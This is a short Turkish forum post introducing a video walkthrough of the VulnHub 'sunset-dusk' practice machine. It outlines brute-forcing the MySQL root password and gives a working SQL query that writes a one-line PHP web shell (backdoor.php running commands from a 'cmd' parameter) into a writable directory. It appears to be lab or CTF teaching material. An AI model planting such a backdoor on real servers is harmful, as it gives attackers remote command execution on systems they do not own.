MySQL Servisinden Sunucuya Sızma

Başlatan admin, Ekm 14, 2020, 12:41 öö

« önceki - sonraki »

admin

Ekm 14, 2020, 12:41 öö Son düzenlenme: Ekm 14, 2020, 12:42 öö admin
Arkadaşlar merhaba, bu videoda sizlere, MySQL servisinden sisteme sızma konusundan  bahsedicem. Brute force yoluyla root parolasını öğrendikten sonra, sql sorgusu kullanarak hedefte, yazılabilir bi dizinde  oluşturacağımız backdoor.php dosyasıyla sisteme sızmak mümkün.

Hedef Sanal Sistem : https://www.vulnhub.com/entry/sunset-dusk,404/
MySQL'de Sorgu Yoluyla Dosya(backdoor.php) Oluşturmak İçin :  select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/backdoor.php' ;